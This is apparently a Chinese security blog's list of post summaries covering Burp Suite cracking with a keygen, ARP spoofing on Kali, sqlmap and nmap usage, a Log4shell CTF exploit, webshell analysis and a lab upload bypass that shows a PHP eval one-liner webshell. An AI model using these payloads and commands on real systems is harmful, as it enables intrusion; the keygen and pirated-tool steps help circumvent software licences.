为伊消得人憔悴/

摘要： 下载这三个 分别是 破解 安装包 汉化包 安装后将汉化包 破解软件放在这里 该文件夹下启动cmd运行 java -jar BurpLoaderKeygen.jar run将License内容放进去 之后来到 将Request里面的复制回去 得到Response 放入burpsuit Next 里面增 阅读全文

摘要： 1 查看自己的ip和网卡名 ifconfig 扫描局域网 nmap -sP [所在网段]（例如192.168.10.*） （我的是kali 139 win10 143 网关2） 2 kali开启流量转发 echo 1 >/proc/sys/net/ipv4/ip_forward3 安装arpspoo 阅读全文

摘要： 首先我们需要将Proteus 8 Professional Keil uVision4两个软件下载下来 下载后进行安装 路径选下(将两个放在一个目录下) 之后在属性--安全--用户xxx 下允许权限全部勾上 之后打开软件 点击new project 自己选择一个路径 点下去 点击p选择元器件（com 阅读全文

摘要： 前几天网站服务器被注入了冰蝎内存马，通过对内存马进行分析发现了key 日志被清了 就对整机流量使用wireshark进行分析 之后进行了流的过滤和追踪 Python解密成之后查看下对服务器的操作 有的反编译出来依旧是base64加密内容 附上解密代码 # coding:utf-8 import ba 阅读全文

摘要： http://www.xoslab.com/efl.html 无脑点就行(自定义安装) 操作比较简单就是推荐下 emm设置密码 然后添加删除修改权限尽量关了后改 （重装就别怪我） 文件文件夹 程序 挺简单好用但肯定没VeraCrypt难解 阅读全文

摘要： https://pan.baidu.com/s/17o2ubsvLq8wHGhkjAGomCw 提取码：tpj0（感谢晓雾安全，由晓雾安全提供） 解压后是这样的 点击acunetix_14.7.220425114 安装awvs Next 接受 next 存储地址 Next 随便填个邮箱密码（密码由特 阅读全文

摘要： https://ctf.bugku.com/challenges/detail/id/340.html?page=2下载git命令apt-get install git git clone https://github.com/black9/Log4shell_JNDIExploit.gitjava 阅读全文

摘要： 布尔 时间 报错 联合 堆叠 非应用通信注入 sqlmap标准流程： （跳过某个参数） 1.sqlmap -u "目标注入点" --dbs --skip 参数 （指定某个参数） --dbs -p 参数 2.sqlmap -u "目标注入点" -D security --tables 3.sqlmap 阅读全文

摘要： nmap [IP] 常规扫描 nmap -p [需要扫描的端口范围] [目标IP] 常规指定范围扫描 nmap [目标网段].*扫描网段中所有的主机 nmap -O [目标IP] 扫描指纹信息 nmap -sV -p- [目标IP] 全端口扫描目标ip段 nmap -T4 -sP [目标IP] 是否 阅读全文

摘要： https://www.mozhe.cn/bug/detail/MGt2VGdsK093TkdtcURBSXFySnZpUT09bW96aGUmozhe首先先传个图片抓个包 接下来传个一句话试试<?php eval($_POST['abc']);?> 发现不行 抓个包发现Content-Type不对 阅读全文